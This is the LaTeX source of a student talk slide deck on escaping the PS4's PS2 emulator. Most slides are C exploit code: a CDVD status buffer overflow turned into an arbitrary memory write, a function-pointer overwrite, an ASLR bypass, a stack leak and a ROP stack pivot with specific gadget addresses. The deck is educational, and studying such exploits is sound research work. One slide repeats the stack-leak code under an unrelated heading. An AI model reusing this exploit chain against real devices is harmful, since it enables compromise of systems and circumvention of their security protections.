\documentclass{lug}
\usepackage{minted}
\newcommand{\splitslide}[4]{
    \noindent
    \begin{minipage}{#1 \textwidth - #2}
        #3
    \end{minipage}%
    \hspace{ \dimexpr #2 * 2 \relax}%
    \begin{minipage}{\textwidth - #1 \textwidth - #2}
        #4
    \end{minipage}
}

\title{Ecaping the PS4}
\author{Jesus Nu\~{n}ez\\}

\begin{document}

\section{lug.mines.edu/attend}

\section{What makes an exploit?}

\begin{frame}{Exploits}
    \splitslide{0.3}{.7em}{
        \begin{itemize}
            \item Entry Point
            \item Escape
            \item Escalation
            \item Linux!
        \end{itemize}
    }{
        \includegraphics[scale=0.3]{graphics/exploit.jpg}
    }
\end{frame}
\section{PS4 security}

\begin{frame}{PS4}
\begin{itemize}
    \item The PS4 features a custom AMD x86(architecture)-64(bits) CPU
    \item It utilizes WebKit for it's web engine
    \item The CPU has controls for memory. Ex. Pages of memory marked as executable can't be written to. (Data Execution Prevention (DEP))
    \item Fault protections exist for divide by 0, segfaulting, access violations
\end{itemize}
\includegraphics[scale=0.2]{graphics/PS4CPU.jpg}\hspace{3em}\includegraphics[scale=0.3]{graphics/segfault.png}
\end{frame}

\begin{frame}{PS4 Cont}
    \begin{itemize}
        \item Address Space Layout Randomization (ASLR) so nothing is in the same place twice
        \item Uses the same system call convention as Linux and MS-DOS instead of the FreeBSD way (registers vs stack)
        \item The system call ids were not shuffled for security through obscurity
        \item The WebKit engine is sandboxed
        \item The PS4 runs PS2 games!
    \end{itemize}
\end{frame}

\begin{frame}{PS4 ASLR}
    \hspace*{-2.5em}
    \includegraphics[scale=0.3]{graphics/ASLR.png}
\end{frame}

\section{Playstation 2 in 4}

\begin{frame}{The PS2 entry point}
    The PS4 runs an emulator for PS2 games bought through the PSN store. The PS2 emulator itself is JIT privileged code.\\\\
    The PS2 Emulator itself runs in two different processes. The main application process from a file called eboot.bin and the compiler 
    child process called ps2-emu-compiler.self.
\end{frame}

\begin{frame}{JIT}
    JIT stands for Just In Time. It is a method of running code where the code compiles as it runs. This is different from interpreted since the code 
    is actually compiled into machine code. 
    \begin{center}
        \includegraphics[scale=0.06]{graphics/JAVAJIT.png}
    \end{center}
\end{frame}

\begin{frame}{Processes protections}
    For security, each process is given distinct permissions. The compiler can write code while the main application can only execute code. 
\end{frame}

\begin{frame}{Step 1: Escape the game}
    First, we want to not be in the game anymore. While the PS2 game is running, we are not running our own code. And that's bad!\\\\
    Thankfully, many PS2 game exploits exist through either save file manipulation or game inputs that allow for code execution.\\ However, do note,
     this code execution is in the emulator. We have not escaped anything yet.
\end{frame}

\section{Starting to escape the Emulator}

\begin{frame}{What do we need?}
    \begin{itemize}
        \item The ability to write to anywhere in memory
        \item The ability to cause jumps
        \item The ability to jump to code we want to run
    \end{itemize}
    
\end{frame}

\section{Part 1}
\begin{frame}[fragile]{The emu exploit}
    \begin{minted}{c}
    case 0x1f402005: // N_STATUS
        currentbufferoffset = (ulong)nstatusindex;
        nstatusindex = nstatusindex + 1;
        (&nstatusbuffer)[currentbufferoffset] = b;
        bVar3 = DAT_014977d5;
        break;
        ...
    case 0x1f402017: // S_STATUS
        currentbufferoffset = (ulong)sstatusindex;
        sstatusindex = sstatusindex + 1;
        (&sstatusbuffer)[currentbufferoffset] = b;
        bVar3 = DAT_014977d5;
        break;
    \end{minted}
\end{frame}

\begin{frame}[fragile]{OVERFLOW!!!}
\begin{minted}[\scriptsize]{c}
void resetSStatusIndex(void) {
    // Submit invalid command!
    *S_CMD = 0;
    // Wait for completion (busy flag to be cleared)
    while((*S_STATUS) & 0x80);
    // Flush S command result
    while(!((*S_STATUS) & 0x40)) (void)S_IN;
}
void sStatusBufferOverflow(void *overflow, unsigned int overflowSize) {
    resetSStatusIndex();
    // Fill the buffer
    for(int i = 0; i < 0x10; i++) {
        *S_STATUS = 0;
    }
    // Begin writing out-of-bounds
    for(int i = 0; i < overflowSize; i++) {
        *S_STATUS = ((unsigned char *)overflow)[i];
    }
}
\end{minted}
\end{frame}
\begin{frame}[fragile]{What do we overwrite?}
    \begin{minted}{c}
0x897810 n status buffer (16-bytes)
0x897820 s status buffer (16-bytes)
    (0x60 bytes of other variables)
0x897890 n status index (4-bytes)
    (0xc bytes of other variables)
0x8978A0 s status index (4-bytes)
    \end{minted}

\end{frame}

\section{part 2}

\begin{frame}[fragile]{Using the N index}
    \begin{minted}[\scriptsize]{c}
void resetNStatusIndex(void) {
    // Submit invalid command!
    *N_CMD = 0;
    // Wait for completion (busy flag to be cleared)
    while((*N_STATUS) & 0x80);
}
void setOOBindex(unsigned int index) {
    resetNStatusIndex();
    unsigned char overflow[0x60 + sizeof(index)] = {};
    // Overwrite N status index
    overflow[0x60 + 0] = index >> 0;
    overflow[0x60 + 1] = index >> 8;
    overflow[0x60 + 2] = index >> 16;
    overflow[0x60 + 3] = index >> 24;
    sStatusBufferOverflow(overflow, sizeof(overflow));
}

void writeToOOBIndex(unsigned char v) {
    // Perform OOB write to N status index and advance index
    *N_STATUS = v;
}

void writeOOB1(unsigned int index, unsigned char v) {
    setOOBindex(index);
    writeToOOBIndex(v);
}

// ... writeOOB2, writeOOB4, writeOOB8, writeOOBN ...
    \end{minted}
\end{frame}

\section{Now we have writing to memory!}

\begin{frame}{System calls}
    \hspace{-1.1em}
    \includegraphics[scale=0.32]{graphics/syscall.jpg}
\end{frame}

\section{Now where are we in memory}

\begin{frame}{Remember the ASLR}
    \hspace*{-2.5em}
    \includegraphics[scale=0.3]{graphics/ASLR.png}
\end{frame}

\section{Part 3}

\begin{frame}{How does RAM work?}
    \includegraphics[scale=0.6]{graphics/paging.jpg}
\end{frame}

\begin{frame}{Where in Kansas are we?}
    To our benefit, anything in memory must allign with a page on the PS4. Pages are a set size of $2^{14}$ bits. Due to behavior of the PS4, we don't know where we are exactly,
    but we do know that all the addresses are relatively exactly the same. \\
    This lets us be confident where function pointers are. In relation to the part we are using to write from. \\
\end{frame}

\begin{frame}[fragile]{The behavior of syscalls}
    
    \begin{minted}{c}
0x6E4098: LEA RAX, [ioRegisterReadHandlers]
...
0x6E40B2: CALL qword ptr [RCX + RAX*0x1]
    \end{minted}
    
\end{frame}

\begin{frame}[fragile]{overwriting}
    \begin{minted}[\footnotesize]{c}
// Redirecting the emulator's IO read function pointer lets us 
//call an arbitrary address and get back whatever eax holds after 
//it returns
unsigned int callGadgetAndGetResult
    (unsigned int gadget, unsigned int gadgetSize) {
    unsigned int ioReadFunctionPointerIndex 
        = IO_REGISTER_READ_HANDLERS - N_STATUS_BUFFER;
    volatile unsigned int *io = (void *)0x10000000;
    // Corrupt the function pointer
    if(gadgetSize == 4) writeOOB4(ioReadFunctionPointerIndex, gadget);

    // Overwrite just the least significant byte, for before 
    //we've defeated ASLR
    else if(gadgetSize == 1) 
        writeOOB1(ioReadFunctionPointerIndex, gadget);
    // Call the corrupted function pointer
    return *io;
}
    \end{minted}
\end{frame}

\begin{frame}[fragile]{There we are}
    \begin{minted}[\footnotesize]{c}
unsigned int getEbootDiff(void) {
    // Corrupt the least significant byte from 0x50 -> 0x81
    //(0x60 -> 0x91 in Okage), to point to a ret instruction
    // this will make the call return without updating eax 
    //(it will still hold the address of the function pointer itself)
    unsigned int ioFunctionPointerAddress = 
        callGadgetAndGetResult(PARTIAL_POINTER_OVERWRITE_RET, 1);

    unsigned int ebootDiff = 
        ioFunctionPointerAddress - IO_REGISTER_READ_HANDLERS;

    return ebootDiff;
}
    \end{minted}
\end{frame}

\begin{frame}[fragile]{Results!}
    \begin{minted}{c}
eboot executable pages - 0x400000
eboot read-only pages - 0x750000
eboot read-write pages - 0x768000
eboot read-write pages - 0x76c000
    \end{minted}
\end{frame}

\section{ASLR defeated!}



\begin{frame}{Now for more information}
    It would be nice to know where the stack is.
    \includegraphics[scale=0.28]{graphics/stack.jpg}
\end{frame}

\begin{frame}[fragile]{The Stack Address!}
    \begin{minted}[\footnotesize]{c}
// "Runtime_EE start" stack page base address
unsigned long getStackBase(unsigned int ebootDiff) {
    #define STACK_DIFF (0x7EECAFAE8 - 0x7EEC90000)
    //0x6BE323: add eax, esp ; ret
    unsigned int add_eax_esp_ret = 0x6BE323 + ebootDiff;

    unsigned long stackLeak = 
        (callGadgetAndGetResult(add_eax_esp_ret, 4) 
            - (IO_REGISTER_READ_HANDLERS + ebootDiff)) | 0x700000000;

    return stackLeak - STACK_DIFF;
}
    \end{minted}
\end{frame}

\section{Game over now literally}

\begin{frame}{Calling functions with arguments}
    So far all the previous functions have not been calling functions with arguments.\\
    Arguments are tricky as they need to be stored and declared correctly to actually work. So we need to take control of the stack.
    \\
    This is called pivoting the stack. We essentially replace the entire previous stack with our new stack!
    
\end{frame}

\begin{frame}{Pivot!}
    \includegraphics[scale=0.17]{graphics/pivot.jpg}
\end{frame}

\begin{frame}[fragile]
    \begin{minted}[\scriptsize]{c}
        //0x7E677C: push rsi ; add bh, cl ; call qword [rsi+0x3B] ;  (1 found)
        unsigned int push_rsi_call_deref_rsi_plus_3b = 0x7E677C + ebootDiff;

        //0x49A2E6: pop rcx ; fld st0, st5 ; clc  ; pop rsp ; ret  ;  (2 found)
        unsigned int pop_rcx_pop_rsp_ret = 0x49A2E6 + ebootDiff;

        unsigned int pop_rsp_ret = 0x49A2EA + ebootDiff;

        // Let's write initial chain to some free space
        unsigned int initialROP_address = FREE_SPACE + ebootDiff;

        setOOBindex(FREE_SPACE - N_STATUS_BUFFER);

        writeOOB8_presetIndex(pop_rsp_ret);
        writeOOB8_presetIndex(toNative(ropChain));

        setOOBindex(FREE_SPACE - N_STATUS_BUFFER + 0x3b);

        writeOOB8_presetIndex(pop_rcx_pop_rsp_ret);

        callGadgetWithArgument(push_rsi_call_deref_rsi_plus_3b, initialROP_address);
    \end{minted}
\end{frame}

\begin{frame}[fragile]{Function arguments}
\begin{minted}[\footnotesize]{c}
// "Runtime_EE start" stack page base address
unsigned long getStackBase(unsigned int ebootDiff) {
    #define STACK_DIFF (0x7EECAFAE8 - 0x7EEC90000)
    //0x6BE323: add eax, esp ; ret
    unsigned int add_eax_esp_ret = 0x6BE323 + ebootDiff;

    unsigned long stackLeak = 
    (callGadgetAndGetResult(add_eax_esp_ret, 4) - 
    (IO_REGISTER_READ_HANDLERS + ebootDiff)) | 0x700000000;

    return stackLeak - STACK_DIFF;
}
\end{minted}
\end{frame}

\section{Exploit complete}

\begin{frame}{Review}
    \begin{enumerate}[<+->]
        \item Using the initial first block of code we found a way to write arbitrarily to memory.
        \item We found a way to call functions.
        \item We found a way to find where all other functions are.
        \item We pivoted the stack to our own managed stack.
        \item And we called functions with arguments.
    \end{enumerate}
\end{frame}

\section{The PS2 emulator process now belongs to us}

\begin{frame}{Summary}
    \begin{itemize}[<+->]
        \item first bug to overflow buffers 
        \item Using the first bug we can corrupt the index of the N variable for the CDVD N function.
        \item Now this function can write to any part in memory using the previous two bullet points
        \item Using the memory writing power we can corrupt anything including function pointers.
        \item We can call functions that will tell us what parts of memory are
        \item With the memory writing and the location of functions we can call the functions on a pivoted stack
    \end{itemize}
    
\end{frame}


\end{document}
